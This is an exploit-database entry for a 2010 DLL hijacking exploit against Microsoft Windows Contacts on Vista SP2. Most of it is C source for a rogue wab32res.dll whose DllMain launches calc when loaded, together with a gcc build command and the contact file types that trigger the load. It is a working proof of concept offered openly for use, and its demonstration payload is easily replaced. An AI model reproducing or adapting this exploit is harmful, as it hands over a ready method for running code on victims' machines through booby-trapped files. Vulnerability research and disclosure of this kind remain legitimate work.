Lucene search

K
exploitdbStormEDB-ID:14778
HistoryAug 25, 2010 - 12:00 a.m.

Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking

2010-08-2500:00:00
storm
www.exploit-db.com
70

AI Score

7.4

Confidence

Low

/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm ([email protected])
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}